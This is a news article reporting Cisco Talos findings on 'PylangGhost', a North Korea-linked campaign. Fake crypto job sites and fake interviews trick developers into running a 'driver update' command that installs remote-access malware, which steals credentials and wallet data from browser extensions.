North Korea’s ’PylangGhost’ Cyberthreat Exposed: Fake Crypto Job Sites Target Industry Workers

Another day, another cyberattack—this time with Pyongyang's fingerprints all over it. Security researchers at Cisco Talos just unmasked 'PylangGhost,' a North Korean-backed campaign hunting crypto talent through poisoned job listings. Because what's more 2025 than hackers weaponizing LinkedIn?

How the scam works:

Fake recruitment portals promise lucrative blockchain gigs—only to deliver malware cocktails. Targets download what they think are coding tests, but get backdoored Python environments instead. Classic supply-chain attack, now with extra career-ruining spice.

Why crypto? Easy money:

Pyongyang's cyber-army has stolen over $3B in digital assets since 2018 (Chainalysis data). With crypto markets bouncing back, expect more 'help wanted' signs hiding digital pickpockets. Bonus irony: these scams thrive on the same hype that drives token pumps.

Security teams are scrambling to blacklist domains, but the playbook's familiar: socially engineered chaos, laundered through decentralized exchanges. Meanwhile, VCs still swear web3 will 'bank the unbanked.' Sure—after the DPRK finishes unbanking everyone first.

How do North Korean hackers catch their victims?

According to the report, the hacker group lures its victims in through fake job interview campaigns using social engineering. The attackers then create fake job sites that impersonate major crypto firms, including Coinbase, Robinhood and Uniswap among others.

The victims are then required to take part in multiple steps, initiated by fake recruiters. They are then invited to open fraudulent skill-testing websites where their personal information is gathered.

When preparing for the fake interview, the user is then tricked into enabling permission for the site to access their camera and microphone access. During this phase, the fake recruiter will ask them to copy and execute malicious commands under the pretense of installing updated video drivers.

Upon command execution, the malware is able to infiltrate their device. The command enables remote control access of the infected device and grants attackers access to cookies and credentials from over 80 browser extensions.

These include access to password managers and cryptocurrency wallets, including MetaMask, 1Password, NordPass, Phantom, Bitski, Initia, TronLink and MultiverseX.

As previously reported by crypto in April, another North Korean hacking collective, Lazarus Group, have also used similar methods to lure in users. The attackers WOULD deploy fake job applications with at least three strains of detected malware linked to North Korean cyber operations.